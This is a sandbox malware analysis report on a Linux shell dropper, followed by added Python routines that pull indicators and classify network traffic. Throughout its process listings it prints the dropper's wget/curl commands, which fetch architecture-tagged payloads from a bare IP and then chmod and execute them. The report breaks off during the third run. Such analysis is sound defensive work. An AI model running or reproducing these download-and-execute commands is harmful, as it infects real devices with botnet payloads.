Malware Analysis Report

2025-05-06 03:39

Sample ID 241124-bpwmhaspck
Target 513641f5f60d55559c2060489de6d605.bin
SHA256 979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK: Enterprise Matrix V15
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
7/10

SHA256

979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093

Threat Level: Shows suspicious behavior

The file 513641f5f60d55559c2060489de6d605.bin shows suspicious behavior. In all four behavioral runs it acts as a shell downloader (the sandbox executes it as /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh): for each of ten architecture tags (x86, mips, mpsl, arm4, arm5, arm6, arm7, ppc, m68k, sh4) it fetches http://89.22.230.162/bins/UnHAnaAW.<tag> with wget and again with curl -O, copies the download into /tmp/3AvA with cat, marks every entry in /tmp executable with chmod +x (the sandbox's own systemd-private-* directories show up as chmod targets), and runs ./3AvA <tag>. Only the variant matching the detonation platform can execute natively, so nine of the ten executions are expected to fail on any one host, and the signatures below describe the dropper and the stock tools it calls rather than the downloaded payload.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Enterprise Matrix V15. The rendered matrix is absent from this copy of the report; of the signatures below, File and Directory Permissions Modification and System Network Configuration Discovery are ATT&CK technique names (T1222 and T1016 respectively).

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

25s

Max time network

128s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (10 identical rows, one per chmod +x invocation)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A (10 identical rows, one ./3AvA <tag> execution per architecture)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA sh4]
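
Added example (this code is not part of the report, the sandbox, or the sample): a small Python triage routine that reads process command lines like the ones listed above and extracts the indicators a responder wants from this chain, namely the plain-HTTP payload host, the architecture tags requested, the file that was made executable and then run with an architecture argument, and a verdict on whether the chain is a multi-architecture dropper. The command lines it runs on are constructed from this section; ARCH_TAGS, analyze_chain and the verdict threshold are this example's own assumptions, as is the inclusion of tags beyond the ten the report shows.

```python
"""Flag a multi-architecture download-and-execute chain in process command lines.

Added example, not part of the sandbox report or the sample. The sample input
is constructed from the report's behavioral1 Processes section; every name in
this file is the example's own.
"""
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Architecture suffixes used by Linux botnet payload sets. The ten the report
# shows are present; the rest are assumed additions for generality.
ARCH_TAGS = {
    "x86", "x86_64", "i586", "i686", "mips", "mpsl", "mipsel", "arm", "arm4",
    "arm5", "arm6", "arm7", "aarch64", "ppc", "m68k", "sh4", "spc", "sparc",
}
URL_RE = re.compile(r"https?://[^\s'\"]+")

DROPPER = "/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh"
REPORT_ARCHES = ["x86", "mips", "mpsl", "arm4", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4"]

# Constructed sample: one wget/curl/cat/chmod/exec round per architecture, as in
# the report, with the sandbox's own /tmp entries trimmed from the chmod targets.
SAMPLE_CMDLINES = [DROPPER]
for _arch in REPORT_ARCHES:
    SAMPLE_CMDLINES += [
        f"wget http://89.22.230.162/bins/UnHAnaAW.{_arch}",
        f"curl -O http://89.22.230.162/bins/UnHAnaAW.{_arch}",
        f"cat UnHAnaAW.{_arch}",
        f"chmod +x {DROPPER.rsplit('/', 1)[-1]} 3AvA",
        f"./3AvA {_arch}",
    ]


def _is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyze_chain(cmdlines):
    """Return payload hosts, architecture tags, executed drops and a verdict."""
    downloads = []   # (host, scheme, arch tag or "")
    chmod_x = set()  # files given +x
    executed = []    # (basename, first argument)
    for line in cmdlines:
        argv = line.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in ("wget", "curl"):
            for url in URL_RE.findall(line):
                u = urlparse(url)
                name = u.path.rsplit("/", 1)[-1]
                tag = name.rsplit(".", 1)[-1] if "." in name else ""
                downloads.append((u.hostname or "", u.scheme, tag if tag in ARCH_TAGS else ""))
        elif prog == "chmod" and "+x" in argv:
            chmod_x.update(a for a in argv[1:] if a != "+x" and not a.startswith("-"))
        elif argv[0].startswith(("./", "/tmp/")):
            # execution of something relative or out of /tmp, e.g. "./3AvA x86"
            executed.append((prog, argv[1] if len(argv) > 1 else ""))

    hosts = sorted({h for h, scheme, _ in downloads if scheme == "http" and _is_ip_literal(h)})
    arches = sorted({t for _, _, t in downloads if t})
    drops = sorted({p for p, arg in executed if p in chmod_x and arg in ARCH_TAGS})
    return {
        "payload_hosts": hosts,             # plain-HTTP downloads from bare IP literals
        "architectures": arches,            # distinct architecture tags requested
        "dropped_executables": drops,       # chmod +x'ed files run with an arch argument
        # Three or more architectures fetched from a bare-IP HTTP host and run is
        # the loop shape of a Linux IoT botnet dropper (threshold is an assumption).
        "multi_arch_dropper": len(arches) >= 3 and bool(hosts) and bool(drops),
    }


if __name__ == "__main__":
    print(analyze_chain(SAMPLE_CMDLINES))
```

The verdict keys on three things the report shows together: a bare-IP HTTP source, three or more architecture-suffixed payload names, and execution of a chmod +x'ed file with the tag as its argument. A single wget from a bare IP or a lone chmod +x does not trip it, which keeps the rule quiet on package installers and build scripts.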

Network

Country Destination Domain Proto Connections
NL 89.22.230.162:80 N/A tcp 20
N/A 224.0.0.251:5353 N/A udp 1
US 151.101.1.91:443 N/A tcp 1
GB 195.181.164.15:443 N/A tcp 1
GB 185.125.188.62:443 N/A tcp 2

Only 89.22.230.162 is named in the sample's command lines (one wget and one curl request per architecture, 20 in all). The mDNS traffic and the three TLS destinations are not referenced by any process in the run and do not recur in the other three detonations; confirm them against the platform's baseline before treating them as indicators.
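
Added example (not part of the report): a Python routine that collapses a network table like the one above into per-destination connection counts and labels each destination by whether a process command line in the same run referenced its host, so the payload host is separated from multicast chatter and from unexplained TLS connections. The rows are constructed from the table above (the Domain column, empty in every row, is dropped); REFERENCED_HOSTS is taken from the Processes section, and the class names and the coverage metric are this example's own.

```python
"""Separate the payload host from background traffic in a sandbox network table.

Added example, not part of the report. Rows are constructed from the
behavioral1 Network table; all names here are the example's own.
"""
from collections import Counter
from ipaddress import ip_address

# (country, destination, proto), in the order the report lists them
SAMPLE_ROWS = (
    [("NL", "89.22.230.162:80", "tcp")]
    + [("N/A", "224.0.0.251:5353", "udp")]
    + [("NL", "89.22.230.162:80", "tcp")] * 6
    + [("US", "151.101.1.91:443", "tcp")]
    + [("NL", "89.22.230.162:80", "tcp")]
    + [("GB", "195.181.164.15:443", "tcp")]
    + [("GB", "185.125.188.62:443", "tcp")] * 2
    + [("NL", "89.22.230.162:80", "tcp")] * 12
)

# Hosts that appear in the run's process command lines (from the Processes section)
REFERENCED_HOSTS = {"89.22.230.162"}


def classify_destinations(rows, referenced_hosts):
    """Map 'dest/proto' -> (connection count, classification)."""
    counts = Counter((dest, proto) for _country, dest, proto in rows)
    result = {}
    for (dest, proto), n in counts.items():
        host = dest.rsplit(":", 1)[0]  # IPv4 'host:port'; bracketed IPv6 is not handled here
        addr = ip_address(host)
        if host in referenced_hosts:
            cls = "referenced_by_sample"  # the sample itself asked for this host
        elif addr.is_multicast or addr.is_private or addr.is_link_local or addr.is_loopback:
            cls = "multicast_or_local"    # mDNS and similar local chatter
        else:
            # nothing in the run names it: check against the platform baseline
            # before calling it an indicator
            cls = "unattributed"
        result[f"{dest}/{proto}"] = (n, cls)
    return result


def network_iocs(classified):
    """Destinations worth blocking: only those the sample demonstrably contacted."""
    return sorted(k for k, (_n, cls) in classified.items() if cls == "referenced_by_sample")


def coverage(classified):
    """Fraction of all connections explained by the sample's own command lines."""
    total = sum(n for n, _ in classified.values())
    explained = sum(n for n, cls in classified.values() if cls == "referenced_by_sample")
    return explained / total if total else 0.0


if __name__ == "__main__":
    c = classify_destinations(SAMPLE_ROWS, REFERENCED_HOSTS)
    for k, v in c.items():
        print(k, *v)
    print("IOCs:", network_iocs(c), f"coverage={coverage(c):.2f}")
```

On this run 20 of 25 connections are explained by the dropper's own wget and curl calls; the remaining five are the rows a reviewer has to account for separately rather than paste into a blocklist.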

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-armhf-20240611-en

Max time kernel

26s

Max time network

64s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (10 identical rows, one per chmod +x invocation)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A (10 identical rows, one ./3AvA <tag> execution per architecture)

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A (10 identical rows, one per curl invocation)

All ten reads come from the stock /usr/bin/curl on the armhf platform, not from the dropper or from /tmp/3AvA. On ARM the cryptographic library curl links against typically reads /proc/cpuinfo (and /proc/self/auxv) at start-up to detect CPU features, so this antivm hit is library initialisation noise rather than sandbox evasion by the sample.

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A (10 identical rows)
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (10 identical rows)

Both paths are read by curl's TLS library during initialisation (/proc/sys/crypto/fips_enabled is the kernel's FIPS-mode switch); neither is opened by the dropper or the payload.

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto Connections
NL 89.22.230.162:80 N/A tcp 20

Files

memory/818-1-0xb676f000-0xb6780044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-mipsbe-20240611-en

Max time kernel

69s

Max time network

72s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (10 identical rows, one per chmod +x invocation)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A (10 identical rows, one ./3AvA <tag> execution per architecture)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (10 identical rows, one per curl invocation; the TLS library curl loads checks the kernel FIPS-mode switch at start-up, so this is tool noise rather than sample behaviour)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

